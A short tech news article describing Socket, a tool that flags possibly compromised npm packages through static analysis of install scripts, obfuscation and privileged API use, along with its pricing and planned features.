December 9, 2023

A group of software package maintainers has created a tool for defending applications that depend on open-source JavaScript libraries dubbed Socket, the tool uses a proactive defense against open-source software OSS supply chain attacks.

Maintaining the security of open-source software is becoming increasingly challenging, especially since every dependency can lead to dozens or hundreds of transitive dependencies. The security industry is mostly focused on vulnerabilities that have already been discovered. There are many CVE scanners that monitor applications for known vulnerabilities.

Advertisements

Socket has been designed with the assumption that all open-source packages may be malicious. Instead of searching for known vulnerabilities, it tries to detect signs of compromised packages.

Socket uses “deep package inspection” to characterize the behavior of a software package. It analyses both the package code and maintainer behavior to detect the tell-tale signs of a supply chain attack. It runs static analysis on a JavaScript package and all its dependencies to look for risk markers such as install scripts, obfuscated code, high entropy strings, or usage of privileged APIs such as shell, network, filesystem, eval(), and environment variables.

Socket has a total of 70 detection markers in five different categories: supply chain risk, quality, maintenance, known vulnerabilities, and license. These issues as signals into the supply chain risk formula that determines whether we will raise an alert

Advertisements

The tool is available as a paid app for GitHub and also has a free version with limited functionality. In the future, the team will be adding more risk detection techniques as well as advanced reporting features. They will also add support for more languages (Java, Go, Python) and integrations with other platforms (GitLab, Bitbucket).

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d